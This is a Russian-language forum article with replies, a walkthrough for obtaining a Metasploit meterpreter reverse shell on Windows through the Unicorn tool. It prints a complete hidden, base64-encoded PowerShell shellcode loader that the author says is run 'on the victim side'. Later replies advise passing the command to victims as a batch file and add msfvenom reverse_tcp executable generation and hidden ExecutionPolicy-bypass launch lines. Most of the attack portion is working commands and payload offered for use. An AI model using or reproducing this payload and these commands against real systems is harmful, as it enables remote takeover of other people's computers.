Статья Быстрый способ получить meterpreter

Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
1.png

Запускаем.Смотрим help.
2.jpg

Выполняем команду
Код:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.137.137 443
3.png

Получаем два интересных нам файла:
unicorn.rc - скрипт автоматизации вводимых команд для метасплоита(что бы юзер вручную не вводил настройки типа set LHOST , use exploit/multi/handler ... )
powershell_attack.txt -- сама команда для powershell. (Ее нужно скопировать в буфер и запустить на стороне жертвы)
4.jpg

У себя выполняем
Код:
msfconsole -r unicorn.rc
У жертвы команду из powershell_attack.txt
Код:
powershell -window hidden -e JABIAFEAUQAgAD0AIAAnACQAUgBOAG8AIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUgBOAG8AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4AGYANgAsADAAeAAxADIALAAwAHgAMAA1ACwAMAB4ADgANQAsADAAeABkADkALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAZgA5ACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgANwA5ACwAMAB4AGUAZAAsADAAeAA3ADcALAAwAHgAZgBhACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAMQA3ACwAMAB4ADcAMgAsADAAeAA2ADQALAAwAHgAZABjACwAMAB4ADEANwAsADAAeABlADAALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeABhADgALAAwAHgANgAyACwAMAB4AGEAMAAsADAAeAA2ADIALAAwAHgANAAzACwAMAB4ADIANgAsADAAeAA1ADEALAAwAHgAZgAxACwAMAB4ADIAMQAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4AGIAMgAsADAAeAA4AGMALAAwAHgAYwA5ACwAMAB4ADUAOQAsADAAeAA0ADMALAAwAHgAYgBjACwAMAB4ADIAYQAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGIAZgAsADAAeAA3AGUALAAwAHgAZABiACwAMAB4AGYANgAsADAAeAAwAGYALAAwAHgANwAzACwAMAB4ADEAYQAsADAAeAAzAGYALAAwAHgANgBkACwAMAB4ADcAZQAsADAAeAA0AGUALAAwAHgAZQA4ACwAMAB4AGYAOQAsADAAeAAyAGQALAAwAHgANwBmACwAMAB4ADkAZAAsADAAeABiADQALAAwAHgAZQBkACwAMAB4AGYANAAsADAAeABlAGQALAAwAHgANQA5ACwAMAB4ADcANgAsADAAeABlADgALAAwAHgAYQA1ACwAMAB4ADUAOAAsADAAeAA1ADcALAAwAHgAYgBmACwAMAB4AGIAZQAsADAAeAAwADIALAAwAHgANwA3ACwAMAB4ADQAMQAsADAAeAAxADMALAAwAHgAMwBmACwAMAB4ADMAZQAsADAAeAA1ADkALAAwAHgANwAwACwAMAB4ADcAYQAsADAAeAA4ADgALAAwAHgAZAAyACwAMAB4ADQAMgAsADAAeABmADAALAAwAHgAMABiACwAMAB4ADMAMwAsADAAeAA5AGIALAAwAHgAZgA5ACwAMAB4AGEAMAAsADAAeAA3AGEALAAwAHgAMQA0ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAYgBiACwAMAB4ADkAMgAsADAAeABmADMALAAwAHgAYwBmACwAMAB4AGIANQAsADAAeABlADEALAAwAHgAOABlACwAMAB4AGQANwAsADAAeAAwADEALAAwAHgAOQA4ACwAMAB4ADUANAAsADAAeAA1AGQALAAwAHgAOQAyACwAMAB4ADMAYQAsADAAeAAxAGUALAAwAHgAYwA1ACwAMAB4ADcAZQAsADAAeABiAGIALAAwAHgAZgAzACwAMAB4ADkAMAAsADAAeABmADUALAAwAHgAYgA3ACwAMAB4AGIAOAAsADAAeABkADcALAAwAHgANQAyACwAMAB4AGQAYgAsADAAeAAzAGYALAAwAHgAMwBiACwAMAB4AGUAOQAsADAAeABlADcALAAwAHgAYgA0ACwAMAB4AGIAYQAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4ADgAZQAsADAAeAA5ADgALAAwAHgAOQBhACwAMAB4ADIAYgAsADAAeAA1ADQALAAwAHgAOAAwACwAMAB4AGIAYgAsADAAeAA5ADEALAAwAHgAMwBiACwAMAB4AGIAZAAsADAAeABkAGMALAAwAHgANwBhACwAMAB4AGUAMwAsADAAeAAxAGIALAAwAHgAOQA2ACwAMAB4ADkANgAsADAAeABmADAALAAwAHgAMQAxACwAMAB4AGYANQAsADAAeABmAGUALAAwAHgAMwA1ACwAMAB4ADEAOAAsADAAeAAwADYALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeAAyAGIALAAwAHgANwA1ACwAMAB4AGMAYwAsADAAeABmAGUALAAwAHgAOAA3ACwAMAB4ADEAMQAsADAAeAA3AGMALAAwAHgANwA2ACwAMAB4ADAAZQAsADAAeABlADUALAAwAHgAOAAzACwAMAB4AGEAZAAsADAAeABmADYALAAwAHgANwA5ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADUAMwAsADAAeABiADgALAAwAHgAMQBhACwAMAB4ADUANwAsADAAeABjAGIALAAwAHgANgA5ACwAMAB4ADIAMwAsADAAeAAzAGMALAAwAHgAMABiACwAMAB4ADkANgAsADAAeABmADYALAAwAHgAYQA5ACwAMAB4ADAAZQAsADAAeAAwADAALAAwAHgAMwA5ACwAMAB4ADgANQAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGQAMQAsADAAeABkADQALAAwAHgAOQBhACwAMAB4ADUAOAAsADAAeAA5ADkALAAwAHgANQAwACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABkACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgAZQBhACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAOAAxACwAMAB4ADgAMgAsADAAeAA5ADcALAAwAHgAZgBjACwAMAB4AGYAZQAsADAAeABiADIALAAwAHgAOQA3ACwAMAB4AGQANgAsADAAeAA5ADYALAAwAHgANQA4ACwAMAB4ADcAOAAsADAAeAA4AGYALAAwAHgAYwBmACwAMAB4AGYANAAsADAAeABlADEALAAwAHgAOABhACwAMAB4ADgANAAsADAAeAA2ADUALAAwAHgAZQBkACwAMAB4ADAAMAAsADAAeABlADEALAAwAHgAYQA1ACwAMAB4ADYANQAsADAAeABhADcALAAwAHgAMQA1ACwAMAB4ADYAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4ADAANQAsADAAeAAxAGIALAAwAHgANwBlACwAMAB4ADkAOQAsADAAeAA3ADQALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAAzADcALAAwAHgAMQAyACwAMAB4ADMAMQAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4AGIANQAsADAAeAA2ADYALAAwAHgAOAAwACwAMAB4AGIAZQAsADAAeABlADAALAAwAHgANAAwACwAMAB4ADAAZgAsADAAeAA0ADAALAAwAHgAYwA3ACwAMAB4AGQAYgAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAOAAsADAAeABiADMALAAwAHgAZQA2ACwAMAB4ADMAOAAsADAAeAAyADkALAAwAHgANAAzACwAMAB4AGIAMQAsADAAeAA1ADIALAAwAHgAMgA5ACwAMAB4ADIAYgAsADAAeAA2ADUALAAwAHgAMAA3ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeABlAGUALAAwAHgAYwAzACwAMAB4AGYAZgAsADAAeAAxAGQALAAwAHgANAA3ACwAMAB4AGIAMAAsADAAeABhADgALAAwAHgANwA1ACwAMAB4ADYANQAsADAAeABlAGYALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAA5ADYALAAwAHgAZABhACwAMAB4ADIAMQAsADAAeAAyADUALAAwAHgANAAxACwAMAB4ADIAMgAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBjAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAE8AYwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAGMATgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEgAUQBRACkAKQA7ACQAMQB0AHoAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADAANgBlACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkADAANgBlACAAJAAxAHQAegAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAxAHQAegAgACQAZQAiADsAfQA=
6.png

5.jpg

Ловим сессию.
Всем спасибо)


 
Спасибо за информативную статью, учусь пентестингу, и наткнулся на ваши статьи. Сильно продвинулся. Еще раз спасибо.
 
Поднимаю хандлер, но сессию взять немогу... Не копипастом, не .бат, немогу понять почему. (АВ выключала, и выключала для тестов) Есть у кого-то предположения почему так?
 
все должно работать..я сам пользовался данной тулзой в свое время..попробуйте поменять на https, очень часто меня это выручает.
 
  • Нравится
Реакции: Сергей Попов
Ее нужно скопировать в буфер и запустить на стороне жертвы
Зачемона нужна еслу уже есть доступ к пк?
 
Ее нужно скопировать в буфер и запустить на стороне жертвы
Зачемона нужна еслу уже есть доступ к пк?
А кто сказал, что есть доступ к пк?
команду для powershell подсовываете жертве в виде батника или по другому.
В реальных условиях придется самому допиливать.
Это всего лишь один из вариантов.
 
А кто сказал, что есть доступ к пк?
команду для powershell подсовываете жертве в виде батника или по другому.
В реальных условиях придется самому допиливать.
Это всего лишь один из вариантов.
Просто написано скопировать и запустить)))
 
Еще из схожих и удобных инструментов - setoolkit. Статья хорошая, ну а я пошел учиться поднимать hta сервер.
 
Поднимаю хандлер, но сессию взять немогу... Не копипастом, не .бат, немогу понять почему. (АВ выключала, и выключала для тестов) Есть у кого-то предположения почему так?
Такая же фигня, не "tcp" не "https" сессии не даёт...
Help me кто нибудь )
 
добрый вечер, вы можете скрин выслать .того что вы делали.. мне легче будет вам дать дельный совет,отталкиваясь от фактов..
 
добрый вечер, вы можете скрин выслать .того что вы делали.. мне легче будет вам дать дельный совет,отталкиваясь от фактов..
Благодарю, за внимание к моему вопросу )

Ситуация такова:
Ловлю сессию через "Empire", порт 4444
Потом использую такую команду, для получения кода в "unicorn" - "python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.35 443"
Запускаю "Метасплоит" - "msfconsole -r unicorn.rc"
Запускаю код от "unicorn", на целевой машине в "cmd", в "powershell", как "батник"...
В "Метасплоите" тишина...
Unicorn.png
Unicorn1.png
Unicorn2.png
Unicorn3.png
Unicorn4.png


Может быть дело с портами. Потому что с 433 портом не чего не делал. Но вчера остановился на том, что пробовал его открыть, так вообще пинговаться всё перестало )

Так же делаю так:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.35 LPORT=443 -f exe > /root/test.exe
Запускаю этот файл на целевой машине, активирую слушателя в "метасплоит"
Ооо, этот приём сегодня работает, вчера вечером разок пробовал, не получалось....

Но первая проблема всё ещё актуальна...
 

Вложения

  • Unicorn.png
    Unicorn.png
    165 КБ · Просмотры: 184
  • Unicorn1.png
    Unicorn1.png
    199,9 КБ · Просмотры: 186
Последнее редактирование:
  • Нравится
Реакции: Johnnnnnnnn
cmd.exe /c start /min unicorn.bat ^& exit
Благодарю за участие.
Эту команду как надо было выполнить? Просто закинуть код из "unicorn" в .bat. А потом в "cmd" выполнить "cmd.exe /c start /min unicorn.bat ^& exit"?
Если да, то не работает...

1.png
powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output
А с этим что делать?
В "powershell" писать "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output" и потом через пробел команду от "unicorn"?
Если да, то тоже не работает...
2.png
 
Благодарю за участие.
Эту команду как надо было выполнить? Просто закинуть код из "unicorn" в .bat. А потом в "cmd" выполнить "cmd.exe /c start /min unicorn.bat ^& exit"?
Если да, то не работает...


А с этим что делать?
В "powershell" писать "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc UnicronBase64output" и потом через пробел команду от "unicorn"?
Если да, то тоже не работает...
После ....-enc код_из_единорога
Само слово UnicronBase64output замени кодом.
 
  • Нравится
Реакции: Mitistofel
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!